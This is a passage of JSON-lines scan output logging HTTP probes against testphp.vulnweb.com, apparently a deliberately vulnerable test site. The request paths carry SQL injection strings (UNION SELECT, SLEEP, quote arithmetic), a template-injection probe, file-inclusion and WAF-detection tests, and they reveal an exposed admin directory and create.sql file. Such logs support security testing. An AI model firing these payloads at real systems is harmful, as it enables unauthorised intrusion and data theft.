Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/acunetix_file_inclusion_test?,0,NULL,active\",\"time\":\"348.394153ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:49.100276717Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/acunetix_file_inclusion_test?,1,NULL,active\",\"input\":\"http://testphp.vulnweb.com/acunetix_file_inclusion_test?,1,NULL,active\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/acunetix_file_inclusion_test?,1,NULL,active\",\"time\":\"355.842765ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:49.25157737Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/acunetix_file_inclusion_test?,97,NULL,active\",\"input\":\"http://testphp.vulnweb.com/acunetix_file_inclusion_test?,97,NULL,active\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/acunetix_file_inclusion_test?,97,NULL,active\",\"time\":\"343.522131ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:49.352267897Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/admin/\",\"input\":\"http://testphp.vulnweb.com/admin/\",\"title\":\"Index of /admin/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/admin/\",\"time\":\"356.142695ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":66,\"lines\":8,\"status_code\":200,\"content_length\":262,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:49.418034174Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/admin/)\",\"input\":\"http://testphp.vulnweb.com/admin/)\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/admin/)\",\"time\":\"340.053698ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:49.445982622Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/admin/3\",\"input\":\"http://testphp.vulnweb.com/admin/3\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/admin/3\",\"time\":\"350.409801ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:49.493851846Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/admin/3M\",\"input\":\"http://testphp.vulnweb.com/admin/3M\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/admin/3M\",\"time\":\"348.557005ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:49.563167754Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/admin/A01\",\"input\":\"http://testphp.vulnweb.com/admin/A01\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/admin/A01\",\"time\":\"351.644993ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:49.741222705Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/admin/create.s\",\"input\":\"http://testphp.vulnweb.com/admin/create.s\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/admin/create.s\",\"time\":\"352.869241ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:49.798497688Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/admin/create.sql\",\"input\":\"http://testphp.vulnweb.com/admin/create.sql\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"application/octet-stream\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/admin/create.sql\",\"time\":\"343.103836ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":35,\"lines\":26,\"status_code\":200,\"content_length\":523,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:49.807084321Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/admin/create.sqlA01\",\"input\":\"http://testphp.vulnweb.com/admin/create.sqlA01\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/admin/create.sqlA01\",\"time\":\"340.285497ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:49.864792139Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/admin/create.sqlA01http://testphp.vulnweb.com/artists.php\",\"input\":\"http://testphp.vulnweb.com/admin/create.sqlA01http://testphp.vulnweb.com/artists.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/admin/create.sqlA01http://testphp.vulnweb.com/artists.php\",\"time\":\"354.904928ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:50.044243129Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/admin/create.sqlA01http://testphp.vulnweb.com/artists.phpA01\",\"input\":\"http://testphp.vulnweb.com/admin/create.sqlA01http://testphp.vulnweb.com/artists.phpA01\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/admin/create.sqlA01http://testphp.vulnweb.com/artists.phpA01\",\"time\":\"357.558783ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:53.288461613Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/alraziuni.edu.ye/\",\"input\":\"http://testphp.vulnweb.com/alraziuni.edu.ye/\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/alraziuni.edu.ye/\",\"time\":\"343.857493ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:53.404470743Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/app-ads.txt\",\"input\":\"http://testphp.vulnweb.com/app-ads.txt\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/app-ads.txt\",\"time\":\"347.740113ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:53.486634459Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artist.php?artist=1\",\"input\":\"http://testphp.vulnweb.com/artist.php?artist=1\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artist.php?artist=1\",\"time\":\"347.983205ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:53.545599244Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php\",\"input\":\"http://testphp.vulnweb.com/artists.php\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php\",\"time\":\"350.146982ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":503,\"lines\":105,\"status_code\":200,\"content_length\":5328,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:53.895810231Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php,http-waf-\",\"input\":\"http://testphp.vulnweb.com/artists.php,http-waf-\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php,http-waf-\",\"time\":\"350.328307ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:54.263164915Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php,http-wafdetect\",\"input\":\"http://testphp.vulnweb.com/artists.php,http-wafdetect\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php,http-wafdetect\",\"time\":\"351.904149ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:54.271562206Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php,http-waf-detect.detectBodyChanges\",\"input\":\"http://testphp.vulnweb.com/artists.php,http-waf-detect.detectBodyChanges\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php,http-waf-detect.detectBodyChanges\",\"time\":\"361.16863ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:54.520551907Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php8\",\"input\":\"http://testphp.vulnweb.com/artists.php8\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php8\",\"time\":\"347.114469ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:55.014779836Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php8H\",\"input\":\"http://testphp.vulnweb.com/artists.php8H\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php8H\",\"time\":\"351.57147ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:55.157508381Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?%20artist=1-SLEEP(3\",\"input\":\"http://testphp.vulnweb.com/artists.php?%20artist=1-SLEEP(3\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?%20artist=1-SLEEP(3\",\"time\":\"353.931067ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":107,\"status_code\":200,\"content_length\":4853,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:58.242904595Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?%CB%93%E2%86%92\",\"input\":\"http://testphp.vulnweb.com/artists.php?%CB%93%E2%86%92\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?%CB%93%E2%86%92\",\"time\":\"351.658227ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":503,\"lines\":105,\"status_code\":200,\"content_length\":5328,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:58.531684371Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?%CB%93%E2%86%92artist=FUZZ\",\"input\":\"http://testphp.vulnweb.com/artists.php?%CB%93%E2%86%92artist=FUZZ\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?%CB%93%E2%86%92artist=FUZZ\",\"time\":\"349.523651ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":503,\"lines\":105,\"status_code\":200,\"content_length\":5328,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:59.272408664Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?%CB%93%E2%86%92artist=FUZZ000003:C=200\",\"input\":\"http://testphp.vulnweb.com/artists.php?%CB%93%E2%86%92artist=FUZZ000003:C=200\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?%CB%93%E2%86%92artist=FUZZ000003:C=200\",\"time\":\"362.411364ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":503,\"lines\":105,\"status_code\":200,\"content_length\":5328,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:59.293577183Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?%CB%93%E2%86%92artist=FUZZ000003:C=200118\",\"input\":\"http://testphp.vulnweb.com/artists.php?%CB%93%E2%86%92artist=FUZZ000003:C=200118\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?%CB%93%E2%86%92artist=FUZZ000003:C=200118\",\"time\":\"348.274333ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":503,\"lines\":105,\"status_code\":200,\"content_length\":5328,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:59.302579884Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?%CB%93%E2%86%92artist=FUZZFUZ2Z\",\"input\":\"http://testphp.vulnweb.com/artists.php?%CB%93%E2%86%92artist=FUZZFUZ2Z\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?%CB%93%E2%86%92artist=FUZZFUZ2Z\",\"time\":\"340.503272ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":503,\"lines\":105,\"status_code\":200,\"content_length\":5328,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:59.368596934Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist\",\"time\":\"350.035712ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":107,\"status_code\":200,\"content_length\":4853,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:59.387872036Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=$%7Binjection\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=$%7Binjection\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=$%7Binjection\",\"time\":\"357.085478ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":107,\"status_code\":200,\"content_length\":4853,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:59.466503381Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=%22%20UNION%20SELECT%201\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=%22%20UNION%20SELECT%201\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=%22%20UNION%20SELECT%201\",\"time\":\"355.279859ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":107,\"status_code\":200,\"content_length\":4853,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:59.630590422Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=%22%20UNION%20SELECT%201,%202\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=%22%20UNION%20SELECT%201,%202\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=%22%20UNION%20SELECT%201,%202\",\"time\":\"356.387939ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":107,\"status_code\":200,\"content_length\":4853,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:59.724939338Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=%22%20UNION%20SELECT%20TRUE\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=%22%20UNION%20SELECT%20TRUE\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=%22%20UNION%20SELECT%20TRUE\",\"time\":\"346.106583ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":107,\"status_code\":200,\"content_length\":4853,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:59.794378863Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=%22.%29%29%29%28.%29%27%28\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=%22.%29%29%29%28.%29%27%28\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=%22.%29%29%29%28.%29%27%28\",\"time\":\"355.786044ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":107,\"status_code\":200,\"content_length\":4853,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:59.811335132Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=%271+2%27\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=%271+2%27\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=%271+2%27\",\"time\":\"350.075346ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":701,\"lines\":124,\"status_code\":200,\"content_length\":6251,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:59.856120213Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=%271-1%27\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=%271-1%27\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=%271-1%27\",\"time\":\"349.851584ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":701,\"lines\":124,\"status_code\":200,\"content_length\":6251,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:59.933276454Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=%271-2%27\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=%271-2%27\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=%271-2%27\",\"time\":\"357.200563ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":701,\"lines\":124,\"status_code\":200,\"content_length\":6251,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:00.102746319Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=%273%27\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=%273%27\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=%273%27\",\"time\":\"345.051061ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":645,\"lines\":124,\"status_code\":200,\"content_length\":6193,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:00.169400899Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=%273-2%27\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=%273-2%27\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=%273-2%27\",\"time\":\"355.077096ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":645,\"lines\":124,\"status_code\":200,\"content_length\":6193,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:00.180385617Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=%274%27\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=%274%27\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=%274%27\",\"time\":\"356.12738ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":482,\"lines\":105,\"status_code\":200,\"content_length\":4735,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02